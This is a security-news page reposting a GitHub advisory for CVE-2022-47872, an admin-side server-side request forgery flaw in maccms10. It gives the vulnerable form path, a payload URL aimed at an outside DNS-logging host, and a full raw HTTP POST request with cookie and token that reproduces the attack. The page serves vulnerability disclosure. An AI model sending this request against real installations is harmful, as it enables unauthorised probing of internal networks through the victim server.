Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-47872: CVE-2022-47872/README.md at main · Cedric1314/CVE-2022-47872

maccms10 2021.1000.2000 is vulnerable to Server-side request forgery (SSRF).

CVE
#vulnerability#web#mac#js#git#intel#php#ssrf#firefox

#CVE-2022-47872

maccms10 admin+ ssrf attacks

Overview

Manufacturer’s website information:https://maccms.pro

Source code download address : https://github.com/maccmspro/maccms10.git

Affected version: V2021.1000.2000

2.Vulnerability details

maccmspro/maccms10#22

Enter the background, click Collect --> Custom interface --> Interface address,

In the name box into payload1:http://7ca8e96e.dns.1433.eu.org.

It can cause ssrf attacks.

Vulnerability name:ssrf attacks

Vulnerability level:Medium risk

Vulnerability location: click Collect --> Custom interface --> Interface address

3.Recurring vulnerabilities and

POST http://192.168.52.163/admin.php/admin/collect/info.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0

Accept: /

AcceptLanguage: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding:gzip,deflate

Content-Type: applicat ion/ x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 226

Origin: http://192.168.52.163

Connection: close

Referer: http://192.168.52.163/admin.php/admin/collect/info.html

Cookie: PHPSESSID=gn328q2i2ruajsh96qoll65ia7

collect_id=&token=8d639020c85bde89f9276381d2460046&collect_name=1111&collect_url=http%3A%2F%2F7ca8e96e.dns.1433.eu.org.&collect_param=%26q%3D1&collect_type=1&collect_mid=1&collect_opt=Ø&collect_filter=0&collect_filter_from=

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907